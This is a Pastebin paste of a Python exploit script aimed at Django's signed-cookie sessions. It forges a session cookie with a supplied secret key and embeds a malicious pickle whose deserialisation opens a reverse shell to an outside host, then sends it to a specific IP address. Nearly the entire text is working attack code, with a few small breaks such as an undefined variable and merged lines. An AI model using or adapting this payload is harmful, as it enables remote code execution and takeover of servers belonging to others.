Guest User

exploit.py

a guest
Aug 4th, 2019
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.35 KB | None | 0 0
  1. import os, hashlib, sys, pickle
  2. import requests, subprocess
  3. from hmac import new as hmac
  4. from base64 import b64encode as b64
  5. class ex(object):
  6. def __reduce__(self):
  7. return(os.system,('python -c\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("167.99.X.X",2121));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',))
  8. def send_django(key, add, payload):
  9. def base64(s): #taken from django
  10. import base64
  11. return base64.urlsafe_b64encode(s).strip(b'=')
  12. def salted_hmac(salt, value, secret): #taken from django
  13. key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
  14. return hmac(key, msg=value, digestmod=hashlib.sha1).digest()import time
  15. import baseconv #taken from django
  16. timestamp = baseconv.base62.encode(str(int(time.time()))).encode()
  17. print(timestamp)
  18. data = base64(payload)+b":"+timestamp
  19. mac = base64(salted_hmac('django.contrib.sessions.backends.signed_cookiessigner', data, key)) #default
  20. salt by django
  21. s = '{}:{}:{}'.format(base64(payload).decode(), timestamp.decode(),mac.decode())
  22. print(s)
  23. print(requests.get(add, cookies={'sessionid':s}).content)
  24. last_viewed = {}
  25. last_viewed['last_viewed'] = ex()#"HACKED"
  26. p = pickle.dumps(a, protocol=4)
  27. send_django("14wzd&o9dg1_ukfajt(6)bs5j*nhf2#_=xop^ry_y)5f8m0apq","http://104.250.105.109:19080/", p)
Advertisement
Add Comment
Please, Sign In to add comment